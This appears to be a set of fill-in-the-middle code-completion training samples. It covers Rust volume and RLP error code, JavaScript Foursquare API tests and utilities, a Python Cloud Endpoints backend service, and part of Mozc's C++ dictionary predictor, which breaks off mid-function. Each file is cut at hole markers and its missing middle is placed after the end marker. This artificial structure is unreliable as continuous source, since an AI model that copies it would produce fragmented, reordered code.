// I'm not sure how to handle overflows, let's saturate for
// now
if v < SOUND_MAX {
*self = Volume(v + 1);
}
}
fn down(&mut self) {
let Volume(v) = *self;
if v > 0 {
*self = Volume(v - 1);
}
}
}<|fim▁end|>
|
fn up(&mut self) {
let Volume(v) = *self;
|
<|file_name|>connect.spec.local.js<|end_file_name|><|fim▁begin|>// this will only run locally to test the connection to foursquare
import chai from 'chai';
import chaiAsPromised from 'chai-as-promised';
import FoursquareConnection from './connect';
import config from 'config';
import nock from 'nock';
chai.should();
chai.use(chaiAsPromised);
const expect = chai.expect;
describe('Live Connection create', () => {
it('should contain empty array', () => {
const connect = new FoursquareConnection();
expect(connect.requests).to.be.array;
expect(connect.requests).to.have.length(0);
});
it('should correctly add url', () => {
const connect = new FoursquareConnection('https://test');
expect(connect.apiUrl).to.equal('https://test');
});
it('should correctly add auth token', () => {
const connect = new FoursquareConnection('https://test', '1234');
expect(connect.accessToken).to.equal('1234');
});
it('should correctly add client keys', () => {
const connect = new FoursquareConnection('https://test', {clientId: 1, clientSecret: 'xyz'});
expect(connect.clientId).to.equal(1);
expect(connect.clientSecret).to.equal('xyz');
});
});
describe('Live Connection post', () => {
it('should error as not implemented', () => {
expect(new FoursquareConnection().post).to.throw('Not implemented yet!');
});
});
describe('Live Connection get venue', () => {
it('should return venue information', (done) => {
const connect = new FoursquareConnection(config.get('venues.api.foursquare.url'), {clientId: config.get('venues.api.foursquare.clientId'), clientSecret: config.get('venues.api.foursquare.clientSecret')}, config.get('venues.api.foursquare.version'));
connect.get('venues/4b474e04f964a520782e26e3');
connect.start().then((data) => {
expect(data).to.have.property('venue');
expect(connect.requests).to.have.length(1);
done();
});
});
it('should fail with bad request', () => {
const connect = new FoursquareConnection(config.get('venues.api.foursquare.url'), {clientId: config.get('venues.api.foursquare.clientId'), clientSecret: config.get('venues.api.foursquare.clientSecret')}, config.get('venues.api.foursquare.version'));
connect.get('venues/balls');
return connect.start().should.eventually.to.be.rejectedWith();
});
it('should reset after start', (done) => {<|fim▁hole|> connect.get('venues/4b474e04f964a520782e26e3');
connect.start(true).then(() => {
expect(connect.requests).to.have.length(0);
done();
});
});
});
describe('Live Connection get venues', () => {
it('should venues given lat lng', (done) => {
const connect = new FoursquareConnection(config.get('venues.api.foursquare.url'), {clientId: config.get('venues.api.foursquare.clientId'), clientSecret: config.get('venues.api.foursquare.clientSecret')}, config.get('venues.api.foursquare.version'));
connect.get('venues/search', {
lat: 40.7,
lng: -74,
radius: 16000,
intent: 'browse'
});
connect.start().then((data) => {
expect(data).to.have.property('venues').with.length;
done();
}).catch((error) => {
});
});
});<|fim▁end|>
|
const connect = new FoursquareConnection(config.get('venues.api.foursquare.url'), {clientId: config.get('venues.api.foursquare.clientId'), clientSecret: config.get('venues.api.foursquare.clientSecret')}, config.get('venues.api.foursquare.version'));
|
<|file_name|>rlperrors.rs<|end_file_name|><|fim▁begin|>// Copyright 2015, 2016 Ethcore (UK) Ltd.
// This file is part of Parity.
// Parity is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
// Parity is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.<|fim▁hole|>// along with Parity. If not, see <http://www.gnu.org/licenses/>.
use std::fmt;
use std::error::Error as StdError;
use rlp::bytes::FromBytesError;
#[derive(Debug, PartialEq, Eq)]
/// Error concerning the RLP decoder.
pub enum DecoderError {
/// Couldn't convert given bytes to an instance of required type.
FromBytesError(FromBytesError),
/// Data has additional bytes at the end of the valid RLP fragment.
RlpIsTooBig,
/// Data has too few bytes for valid RLP.
RlpIsTooShort,
/// Expect an encoded list, RLP was something else.
RlpExpectedToBeList,
/// Expect encoded data, RLP was something else.
RlpExpectedToBeData,
/// Expected a different size list.
RlpIncorrectListLen,
/// Data length number has a prefixed zero byte, invalid for numbers.
RlpDataLenWithZeroPrefix,
/// List length number has a prefixed zero byte, invalid for numbers.
RlpListLenWithZeroPrefix,
/// Non-canonical (longer than necessary) representation used for data or list.
RlpInvalidIndirection,
/// Declared length is inconsistent with data specified after.
RlpInconsistentLengthAndData,
}
impl StdError for DecoderError {
fn description(&self) -> &str {
"builder error"
}
}
impl fmt::Display for DecoderError {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
fmt::Debug::fmt(&self, f)
}
}
impl From<FromBytesError> for DecoderError {
fn from(err: FromBytesError) -> DecoderError {
DecoderError::FromBytesError(err)
}
}<|fim▁end|>
|
// You should have received a copy of the GNU General Public License
|
<|file_name|>utilities.js<|end_file_name|><|fim▁begin|>function Vec2(_x, _y) {
var self = this;
self.x = _x;
self.y = _y;
self.Distance = function (OtherPoint) {
try {
return Math.sqrt(Math.pow(OtherPoint.x - self.x, 2) + Math.pow(OtherPoint.y - self.y, 2));
} catch (e) {
console.error(e);
return false;
}
}
}
<|fim▁hole|>function getMCC(c, e) {
var x;
var y;
if (e.pageX || e.pageY) {
x = e.pageX;
y = e.pageY;
} else {
x = e.clientX + document.body.scrollLeft + document.documentElement.scrollLeft;
y = e.clientY + document.body.scrollTop + document.documentElement.scrollTop;
}
x -= c.offsetLeft + c.clientLeft;
y -= c.offsetTop + c.clientTop;
return new Vec2(x, y);
}<|fim▁end|>
| |
<|file_name|>api_backend_service.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.<|fim▁hole|># See the License for the specific language governing permissions and
# limitations under the License.
#
"""Api serving config collection service implementation.
Contains the implementation for BackendService as defined in api_backend.py.
"""
try:
import json
except ImportError:
import simplejson as json
import logging
from endpoints import api_backend
from endpoints import api_config
from endpoints import api_exceptions
from protorpc import message_types
__all__ = [
'ApiConfigRegistry',
'BackendServiceImpl',
]
class ApiConfigRegistry(object):
"""Registry of active APIs to be registered with Google API Server."""
def __init__(self):
self.__registered_classes = set()
self.__api_configs = set()
self.__api_methods = {}
def register_spi(self, config_contents):
"""Register a single SPI and its config contents.
Args:
config_contents: String containing API configuration.
"""
if config_contents is None:
return
parsed_config = json.loads(config_contents)
self.__register_class(parsed_config)
self.__api_configs.add(config_contents)
self.__register_methods(parsed_config)
def __register_class(self, parsed_config):
"""Register the class implementing this config, so we only add it once.
Args:
parsed_config: The JSON object with the API configuration being added.
Raises:
ApiConfigurationError: If the class has already been registered.
"""
methods = parsed_config.get('methods')
if not methods:
return
service_classes = set()
for method in methods.itervalues():
rosy_method = method.get('rosyMethod')
if rosy_method and '.' in rosy_method:
method_class = rosy_method.split('.', 1)[0]
service_classes.add(method_class)
for service_class in service_classes:
if service_class in self.__registered_classes:
raise api_config.ApiConfigurationError(
'SPI class %s has already been registered.' % service_class)
self.__registered_classes.add(service_class)
def __register_methods(self, parsed_config):
"""Register all methods from the given api config file.
Methods are stored in a map from method_name to rosyMethod,
the name of the ProtoRPC method to be called on the backend.
If no rosyMethod was specified the value will be None.
Args:
parsed_config: The JSON object with the API configuration being added.
"""
methods = parsed_config.get('methods')
if not methods:
return
for method_name, method in methods.iteritems():
self.__api_methods[method_name] = method.get('rosyMethod')
def lookup_api_method(self, api_method_name):
"""Looks an API method up by name to find the backend method to call.
Args:
api_method_name: Name of the method in the API that was called.
Returns:
Name of the ProtoRPC method called on the backend, or None if not found.
"""
return self.__api_methods.get(api_method_name)
def all_api_configs(self):
"""Return a list of all API configration specs as registered above."""
return list(self.__api_configs)
class BackendServiceImpl(api_backend.BackendService):
"""Implementation of BackendService."""
def __init__(self, api_config_registry, app_revision):
"""Create a new BackendService implementation.
Args:
api_config_registry: ApiConfigRegistry to register and look up configs.
app_revision: string containing the current app revision.
"""
self.__api_config_registry = api_config_registry
self.__app_revision = app_revision
@staticmethod
def definition_name():
"""Override definition_name so that it is not BackendServiceImpl."""
return api_backend.BackendService.definition_name()
def getApiConfigs(self, request):
"""Return a list of active APIs and their configuration files.
Args:
request: A request which may contain an app revision
Returns:
ApiConfigList: A list of API config strings
"""
if request.appRevision and request.appRevision != self.__app_revision:
raise api_exceptions.BadRequestException(
message='API backend app revision %s not the same as expected %s' % (
self.__app_revision, request.appRevision))
configs = self.__api_config_registry.all_api_configs()
return api_backend.ApiConfigList(items=configs)
def logMessages(self, request):
"""Write a log message from the Swarm FE to the log.
Args:
request: A log message request.
Returns:
Void message.
"""
Level = api_backend.LogMessagesRequest.LogMessage.Level
log = logging.getLogger(__name__)
for message in request.messages:
level = message.level if message.level is not None else Level.info
record = logging.LogRecord(name=__name__, level=level.number, pathname='',
lineno='', msg=message.message, args=None,
exc_info=None)
log.handle(record)
return message_types.VoidMessage()<|fim▁end|>
| |
<|file_name|>dictionary_predictor.cc<|end_file_name|><|fim▁begin|>// Copyright 2010-2021, Google Inc.
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#include "prediction/dictionary_predictor.h"
#include <algorithm>
#include <cctype>
#include <climits> // INT_MAX
#include <cmath>
#include <cstdint>
#include <list>
#include <map>
#include <set>
#include <string>
#include <utility>
#include <vector>
#include "base/japanese_util.h"
#include "base/logging.h"
#include "base/number_util.h"
#include "base/util.h"
#include "composer/composer.h"
#include "converter/connector.h"
#include "converter/converter_interface.h"
#include "converter/immutable_converter_interface.h"
#include "converter/node_list_builder.h"
#include "converter/segmenter.h"
#include "converter/segments.h"
#include "dictionary/dictionary_interface.h"
#include "dictionary/pos_matcher.h"
#include "prediction/predictor_interface.h"
#include "prediction/suggestion_filter.h"
#include "prediction/zero_query_dict.h"
#include "protocol/commands.pb.h"
#include "protocol/config.pb.h"
#include "request/conversion_request.h"
#include "usage_stats/usage_stats.h"
#include "absl/container/flat_hash_map.h"
#include "absl/flags/flag.h"
#include "absl/strings/match.h"
#include "absl/strings/string_view.h"
#ifndef NDEBUG
#define MOZC_DEBUG
#define MOZC_WORD_LOG_MESSAGE(message) \
absl::StrCat(__FILE__, ":", __LINE__, " ", message, "\n")
#define MOZC_WORD_LOG(result, message) \
(result).log.append(MOZC_WORD_LOG_MESSAGE(message))
#else // NDEBUG
#define MOZC_WORD_LOG(result, message) \
{}
#endif // NDEBUG
namespace mozc {
namespace {
using ::mozc::commands::Request;
using ::mozc::dictionary::DictionaryInterface;
using ::mozc::dictionary::PosMatcher;
using ::mozc::dictionary::Token;
using ::mozc::usage_stats::UsageStats;
// Used to emulate positive infinity for cost. This value is set for those
// candidates that are thought to be aggressive; thus we can eliminate such
// candidates from suggestion or prediction. Note that for this purpose we don't
// want to use INT_MAX because someone might further add penalty after cost is
// set to INT_MAX, which leads to overflow and consequently aggressive
// candidates would appear in the top results.
constexpr int kInfinity = (2 << 20);
// Note that PREDICTION mode is much slower than SUGGESTION.
// Number of prediction calls should be minimized.
constexpr size_t kSuggestionMaxResultsSize = 256;
constexpr size_t kPredictionMaxResultsSize = 100000;
bool IsEnableNewSpatialScoring(const ConversionRequest &request) {
return request.request()
.decoder_experiment_params()
.enable_new_spatial_scoring();
}
// Returns true if the |target| may be reduncant result.
bool MaybeRedundant(const std::string &reference, const std::string &target) {
return absl::StartsWith(target, reference);
}
bool IsLatinInputMode(const ConversionRequest &request) {
return (request.has_composer() &&
(request.composer().GetInputMode() == transliteration::HALF_ASCII ||
request.composer().GetInputMode() == transliteration::FULL_ASCII));
}
bool IsQwertyMobileTable(const ConversionRequest &request) {
const auto table = request.request().special_romanji_table();
return (table == commands::Request::QWERTY_MOBILE_TO_HIRAGANA ||
table == commands::Request::QWERTY_MOBILE_TO_HALFWIDTHASCII);
}
bool IsLanguageAwareInputEnabled(const ConversionRequest &request) {
const auto lang_aware = request.request().language_aware_input();
return lang_aware == commands::Request::LANGUAGE_AWARE_SUGGESTION;
}
// Returns true if |segments| contains number history.
// Normalized number will be set to |number_key|
// Note:
// Now this function supports arabic number candidates only and
// we don't support kanji number candidates for now.
// This is because We have several kanji number styles, for example,
// "一二", "十二", "壱拾弐", etc for 12.
// TODO(toshiyuki): Define the spec and support Kanji.
bool GetNumberHistory(const Segments &segments, std::string *number_key) {
DCHECK(number_key);
const size_t history_size = segments.history_segments_size();
if (history_size <= 0) {
return false;
}
const Segment &last_segment = segments.history_segment(history_size - 1);
DCHECK_GT(last_segment.candidates_size(), 0);
const std::string &history_value = last_segment.candidate(0).value;
if (!NumberUtil::IsArabicNumber(history_value)) {
return false;
}
japanese_util::FullWidthToHalfWidth(history_value, number_key);
return true;
}
bool IsMixedConversionEnabled(const commands::Request &request) {
return request.mixed_conversion();
}
bool IsTypingCorrectionEnabled(const ConversionRequest &request) {
return request.config().use_typing_correction();
}
bool HasHistoryKeyLongerThanOrEqualTo(const Segments &segments,
size_t utf8_len) {
const size_t history_segments_size = segments.history_segments_size();
if (history_segments_size == 0) {
return false;
}
const Segment &history_segment =
segments.history_segment(history_segments_size - 1);
if (history_segment.candidates_size() == 0) {
return false;
}
return Util::CharsLen(history_segment.candidate(0).key) >= utf8_len;
}
bool IsLongKeyForRealtimeCandidates(const Segments &segments) {
constexpr int kFewResultThreshold = 8;
return (segments.segments_size() > 0 &&
Util::CharsLen(segments.segment(0).key()) >= kFewResultThreshold);
}
size_t GetMaxSizeForRealtimeCandidates(const ConversionRequest &request,
const Segments &segments,
bool is_long_key) {
const auto &segment = segments.conversion_segment(0);
const size_t size = (request.max_dictionary_prediction_candidates_size() -
segment.candidates_size());
return is_long_key ? std::min<size_t>(size, 8) : size;
}
size_t GetDefaultSizeForRealtimeCandidates(bool is_long_key) {
return is_long_key ? 5 : 10;
}
ConversionRequest GetConversionRequestForRealtimeCandidates(
const ConversionRequest &request, size_t realtime_candidates_size,
size_t current_candidates_size) {
ConversionRequest ret = request;
ret.set_max_conversion_candidates_size(current_candidates_size +
realtime_candidates_size);
return ret;
}
} // namespace
class DictionaryPredictor::PredictiveLookupCallback
: public DictionaryInterface::Callback {
public:
PredictiveLookupCallback(DictionaryPredictor::PredictionTypes types,
size_t limit, size_t original_key_len,
const std::set<std::string> *subsequent_chars,
Segment::Candidate::SourceInfo source_info,
int unknown_id,
absl::string_view non_expanded_original_key,
const SpatialCostParams &spatial_cost_params,
std::vector<DictionaryPredictor::Result> *results)
: penalty_(0),
types_(types),
limit_(limit),
original_key_len_(original_key_len),
subsequent_chars_(subsequent_chars),
source_info_(source_info),
unknown_id_(unknown_id),
non_expanded_original_key_(non_expanded_original_key),
spatial_cost_params_(spatial_cost_params),
results_(results) {}
PredictiveLookupCallback(const PredictiveLookupCallback &) = delete;
PredictiveLookupCallback &operator=(const PredictiveLookupCallback &) =
delete;
ResultType OnKey(absl::string_view key) override {
if (subsequent_chars_ == nullptr) {
return TRAVERSE_CONTINUE;
}
// If |subsequent_chars_| was provided, check if the substring of |key|
// obtained by removing the original lookup key starts with a string in the
// set. For example, if original key is "he" and "hello" was found,
// continue traversing only when one of "l", "ll", or "llo" is in
// |subsequent_chars_|.
// Implementation note: Although absl::StartsWith is called at most N times
// where N = subsequent_chars_.size(), N is very small in practice, less
// than 10. Thus, this linear order algorithm is fast enough.
// Theoretically, we can construct a trie of strings in |subsequent_chars_|
// to get more performance but it's overkill here.
// TODO(noriyukit): std::vector<string> would be better than set<string>.
// To this end, we need to fix Comopser as well.
const absl::string_view rest = absl::ClippedSubstr(key, original_key_len_);
for (const std::string &chr : *subsequent_chars_) {
if (absl::StartsWith(rest, chr)) {
return TRAVERSE_CONTINUE;
}
}
return TRAVERSE_NEXT_KEY;
}
ResultType OnActualKey(absl::string_view key, absl::string_view actual_key,
int num_expanded) override {
penalty_ = 0;
if (num_expanded > 0 ||
(!non_expanded_original_key_.empty() &&
!absl::StartsWith(actual_key, non_expanded_original_key_))) {
penalty_ = spatial_cost_params_.GetPenalty(key);
}
return TRAVERSE_CONTINUE;
}
ResultType OnToken(absl::string_view key, absl::string_view actual_key,
const Token &token) override {
// If the token is from user dictionary and its POS is unknown, it is
// suggest-only words. Such words are looked up only when their keys
// exactly match |key|. Otherwise, unigram suggestion can be annoying. For
// example, suppose a user registers their email address as める. Then,
// we don't want to show the email address from め but exactly from める.
if ((token.attributes & Token::USER_DICTIONARY) != 0 &&
token.lid == unknown_id_) {
const auto orig_key = absl::ClippedSubstr(key, 0, original_key_len_);
if (token.key != orig_key) {
return TRAVERSE_CONTINUE;
}
}
results_->push_back(Result());
results_->back().InitializeByTokenAndTypes(token, types_);
results_->back().wcost += penalty_;
results_->back().source_info |= source_info_;
return (results_->size() < limit_) ? TRAVERSE_CONTINUE : TRAVERSE_DONE;
}
protected:
int32_t penalty_;
const DictionaryPredictor::PredictionTypes types_;
const size_t limit_;
const size_t original_key_len_;
const std::set<std::string> *subsequent_chars_;
const Segment::Candidate::SourceInfo source_info_;
const int unknown_id_;
absl::string_view non_expanded_original_key_;
const SpatialCostParams spatial_cost_params_;
std::vector<DictionaryPredictor::Result> *results_;
};
class DictionaryPredictor::PredictiveBigramLookupCallback
: public PredictiveLookupCallback {
public:
PredictiveBigramLookupCallback(
DictionaryPredictor::PredictionTypes types, size_t limit,
size_t original_key_len, const std::set<std::string> *subsequent_chars,
absl::string_view history_value,
Segment::Candidate::SourceInfo source_info, int unknown_id,
absl::string_view non_expanded_original_key,
const SpatialCostParams spatial_cost_params,
std::vector<DictionaryPredictor::Result> *results)
: PredictiveLookupCallback(types, limit, original_key_len,
subsequent_chars, source_info, unknown_id,
non_expanded_original_key, spatial_cost_params,
results),
history_value_(history_value) {}
PredictiveBigramLookupCallback(const PredictiveBigramLookupCallback &) =
delete;
PredictiveBigramLookupCallback &operator=(
const PredictiveBigramLookupCallback &) = delete;
ResultType OnToken(absl::string_view key, absl::string_view expanded_key,
const Token &token) override {
// Skip the token if its value doesn't start with the previous user input,
// |history_value_|.
if (!absl::StartsWith(token.value, history_value_) ||
token.value.size() <= history_value_.size()) {
return TRAVERSE_CONTINUE;
}
ResultType result_type =
PredictiveLookupCallback::OnToken(key, expanded_key, token);
return result_type;
}
private:
absl::string_view history_value_;
};
// Comparator for sorting prediction candidates.
// If we have words A and AB, for example "六本木" and "六本木ヒルズ",
// assume that cost(A) < cost(AB).
class DictionaryPredictor::ResultWCostLess {
public:
bool operator()(const DictionaryPredictor::Result &lhs,
const DictionaryPredictor::Result &rhs) const {
return lhs.wcost < rhs.wcost;
}
};
class DictionaryPredictor::ResultCostLess {
public:
bool operator()(const DictionaryPredictor::Result &lhs,
const DictionaryPredictor::Result &rhs) const {
return lhs.cost > rhs.cost;
}
};
DictionaryPredictor::DictionaryPredictor(
const DataManagerInterface &data_manager,
const ConverterInterface *converter,
const ImmutableConverterInterface *immutable_converter,
const DictionaryInterface *dictionary,
const DictionaryInterface *suffix_dictionary, const Connector *connector,
const Segmenter *segmenter, const PosMatcher *pos_matcher,
const SuggestionFilter *suggestion_filter)
: converter_(converter),
immutable_converter_(immutable_converter),
dictionary_(dictionary),
suffix_dictionary_(suffix_dictionary),
connector_(connector),
segmenter_(segmenter),
suggestion_filter_(suggestion_filter),
counter_suffix_word_id_(pos_matcher->GetCounterSuffixWordId()),
general_symbol_id_(pos_matcher->GetGeneralSymbolId()),
unknown_id_(pos_matcher->GetUnknownId()),
predictor_name_("DictionaryPredictor") {
absl::string_view zero_query_token_array_data;
absl::string_view zero_query_string_array_data;
absl::string_view zero_query_number_token_array_data;
absl::string_view zero_query_number_string_array_data;
data_manager.GetZeroQueryData(&zero_query_token_array_data,
&zero_query_string_array_data,
&zero_query_number_token_array_data,
&zero_query_number_string_array_data);
zero_query_dict_.Init(zero_query_token_array_data,
zero_query_string_array_data);
zero_query_number_dict_.Init(zero_query_number_token_array_data,
zero_query_number_string_array_data);
}
DictionaryPredictor::~DictionaryPredictor() {}
void DictionaryPredictor::Finish(const ConversionRequest &request,
Segments *segments) {
if (segments->request_type() == Segments::REVERSE_CONVERSION) {
// Do nothing for REVERSE_CONVERSION.
return;
}
const Segment &segment = segments->conversion_segment(0);
if (segment.candidates_size() < 1) {
VLOG(2) << "candidates size < 1";
return;
}
const Segment::Candidate &candidate = segment.candidate(0);
if (segment.segment_type() != Segment::FIXED_VALUE) {
VLOG(2) << "segment is not FIXED_VALUE" << candidate.value;
return;
}
MaybeRecordUsageStats(candidate);
}
void DictionaryPredictor::MaybeRecordUsageStats(
const Segment::Candidate &candidate) const {
if (candidate.source_info &
Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_NONE) {
UsageStats::IncrementCount("CommitDictionaryPredictorZeroQueryTypeNone");
}
if (candidate.source_info &
Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_NUMBER_SUFFIX) {
UsageStats::IncrementCount(
"CommitDictionaryPredictorZeroQueryTypeNumberSuffix");
}
if (candidate.source_info &
Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_EMOTICON) {
UsageStats::IncrementCount(
"CommitDictionaryPredictorZeroQueryTypeEmoticon");
}
if (candidate.source_info &
Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_EMOJI) {
UsageStats::IncrementCount("CommitDictionaryPredictorZeroQueryTypeEmoji");
}
if (candidate.source_info &
Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_BIGRAM) {
UsageStats::IncrementCount("CommitDictionaryPredictorZeroQueryTypeBigram");
}
if (candidate.source_info &
Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_SUFFIX) {
UsageStats::IncrementCount("CommitDictionaryPredictorZeroQueryTypeSuffix");
}
}
bool DictionaryPredictor::PredictForRequest(const ConversionRequest &request,
Segments *segments) const {
if (segments == nullptr) {
return false;
}
if (segments->request_type() == Segments::CONVERSION) {
VLOG(2) << "request type is CONVERSION";
return false;
}
if (segments->conversion_segments_size() < 1) {
VLOG(2) << "segment size < 1";
return false;
}
std::vector<Result> results;
// Mixed conversion is the feature that mixes prediction and
// conversion, meaning that results may include the candidates whose
// key is exactly the same as the composition. This mode is used in mobile.
const bool is_mixed_conversion = IsMixedConversionEnabled(request.request());
AggregatePredictionForRequest(request, segments, &results);
if (results.empty()) {
return false;
}
if (is_mixed_conversion) {
SetPredictionCostForMixedConversion(*segments, &results);
if (!IsEnableNewSpatialScoring(request)) {
ApplyPenaltyForKeyExpansion(*segments, &results);
}
// Currently, we don't have spelling correction feature when in
// the mixed conversion mode, so RemoveMissSpelledCandidates() is
// not called.
return AddPredictionToCandidates(
request,
true, // Include exact key result even if it's a bad suggestion.
segments, &results);
}
// Normal prediction.
SetPredictionCost(*segments, &results);
if (!IsEnableNewSpatialScoring(request)) {
ApplyPenaltyForKeyExpansion(*segments, &results);
}
const std::string &input_key = segments->conversion_segment(0).key();
const size_t input_key_len = Util::CharsLen(input_key);
RemoveMissSpelledCandidates(input_key_len, &results);
return AddPredictionToCandidates(request, false, // Remove exact key result.
segments, &results);
}
DictionaryPredictor::PredictionTypes
DictionaryPredictor::AggregatePredictionForRequest(
const ConversionRequest &request, Segments *segments,
std::vector<Result> *results) const {
const bool is_mixed_conversion = IsMixedConversionEnabled(request.request());
// In mixed conversion mode, the number of real time candidates is increased.
const size_t realtime_max_size =
GetRealtimeCandidateMaxSize(request, *segments, is_mixed_conversion);
const auto &unigram_config = GetUnigramConfig(request, *segments);
return AggregatePrediction(request, realtime_max_size, unigram_config,
segments, results);
}
DictionaryPredictor::UnigramConfig DictionaryPredictor::GetUnigramConfig(
const ConversionRequest &request, const Segments &segments) const {
const bool is_mixed_conversion = IsMixedConversionEnabled(request.request());
if (IsLatinInputMode(request)) {
// For SUGGESTION request in Desktop, We don't look up English words when
// key length is one.
const size_t min_key_len_for_latin_input =
(is_mixed_conversion || segments.request_type() == Segments::PREDICTION)
? 1
: 2;
return {&DictionaryPredictor::AggregateUnigramCandidateForLatinInput,
min_key_len_for_latin_input};
}
if (is_mixed_conversion) {
// In mixed conversion mode, we want to show unigram candidates even for
// short keys to emulate PREDICTION mode.
constexpr size_t kMinUnigramKeyLen = 1;
return {&DictionaryPredictor::AggregateUnigramCandidateForMixedConversion,
kMinUnigramKeyLen};
}
// Normal prediction.
const size_t min_unigram_key_len =
(segments.request_type() == Segments::PREDICTION) ? 1 : 3;
return {&DictionaryPredictor::AggregateUnigramCandidate, min_unigram_key_len};
}
DictionaryPredictor::PredictionTypes DictionaryPredictor::AggregatePrediction(
const ConversionRequest &request, size_t realtime_max_size,
const UnigramConfig &unigram_config, Segments *segments,
std::vector<Result> *results) const {
DCHECK(segments);
DCHECK(results);
// Zero query prediction.
if (segments->conversion_segment(0).key().empty()) {
return AggregatePredictionForZeroQuery(request, segments, results);
}
const std::string &key = segments->conversion_segment(0).key();
const size_t key_len = Util::CharsLen(key);
// TODO(toshiyuki): Check if we can remove this SUGGESTION check.
// i.e. can we return NO_PREDICTION here for both of SUGGESTION and
// PREDICTION?
if (segments->request_type() == Segments::SUGGESTION) {
if (!request.config().use_dictionary_suggest()) {
VLOG(2) << "no_dictionary_suggest";
return NO_PREDICTION;
}
// Never trigger prediction if the key looks like zip code.
if (DictionaryPredictor::IsZipCodeRequest(key) && key_len < 6) {
return NO_PREDICTION;
}
}
PredictionTypes selected_types = NO_PREDICTION;
if (ShouldAggregateRealTimeConversionResults(request, *segments)) {
AggregateRealtimeConversion(request, realtime_max_size, segments, results);
selected_types |= REALTIME;
}
// In partial suggestion or prediction, only realtime candidates are used.
if (segments->request_type() == Segments::PARTIAL_SUGGESTION ||
segments->request_type() == Segments::PARTIAL_PREDICTION) {
return selected_types;
}
// Add unigram candidates.
const size_t min_unigram_key_len = unigram_config.min_key_len;
if (key_len >= min_unigram_key_len) {
const auto &unigram_fn = unigram_config.unigram_fn;
PredictionType type = (this->*unigram_fn)(request, *segments, results);
selected_types |= type;
}
// Add bigram candidates.
constexpr int kMinHistoryKeyLen = 3;
if (HasHistoryKeyLongerThanOrEqualTo(*segments, kMinHistoryKeyLen)) {
AggregateBigramPrediction(request, *segments,
Segment::Candidate::SOURCE_INFO_NONE, results);
selected_types |= BIGRAM;
}
// Add english candidates.
if (IsLanguageAwareInputEnabled(request) && IsQwertyMobileTable(request) &&
key_len >= min_unigram_key_len) {
AggregateEnglishPredictionUsingRawInput(request, *segments, results);
selected_types |= ENGLISH;
}
// Add typing correction candidates.
constexpr int kMinTypingCorrectionKeyLen = 3;
if (IsTypingCorrectionEnabled(request) &&
key_len >= kMinTypingCorrectionKeyLen) {
AggregateTypeCorrectingPrediction(request, *segments, results);
selected_types |= TYPING_CORRECTION;
}
return selected_types;
}
bool DictionaryPredictor::AddPredictionToCandidates(
const ConversionRequest &request, bool include_exact_key,
Segments *segments, std::vector<Result> *results) const {
DCHECK(segments);
DCHECK(results);
const std::string &input_key = segments->conversion_segment(0).key();
const size_t input_key_len = Util::CharsLen(input_key);
std::string history_key, history_value;
GetHistoryKeyAndValue(*segments, &history_key, &history_value);
// exact_bigram_key does not contain ambiguity expansion, because
// this is used for exact matching for the key.
const std::string exact_bigram_key = history_key + input_key;
Segment *segment = segments->mutable_conversion_segment(0);
DCHECK(segment);
// Instead of sorting all the results, we construct a heap.
// This is done in linear time and
// we can pop as many results as we need efficiently.
std::make_heap(results->begin(), results->end(), ResultCostLess());
const size_t size = std::min(
request.max_dictionary_prediction_candidates_size(), results->size());
int added = 0;
std::set<std::string> seen;
int added_suffix = 0;
bool cursor_at_tail =
request.has_composer() &&
request.composer().GetCursor() == request.composer().GetLength();
absl::flat_hash_map<std::string, int32_t> merged_types;
#ifndef NDEBUG
const bool is_debug = true;
#else // NDEBUG
// TODO(taku): Sets more advanced debug info depending on the verbose_level.
const bool is_debug = request.config().verbose_level() >= 1;
#endif // NDEBUG
if (is_debug) {
for (const auto &result : *results) {
if (!result.removed) {
merged_types[result.value] |= result.types;
}
}
}
auto add_candidate = [&](const Result &result, const std::string &key,
const std::string &value,
Segment::Candidate *candidate) {
DCHECK(candidate);
candidate->Init();
candidate->content_key = key;
candidate->content_value = value;
candidate->key = key;
candidate->value = value;
candidate->lid = result.lid;
candidate->rid = result.rid;
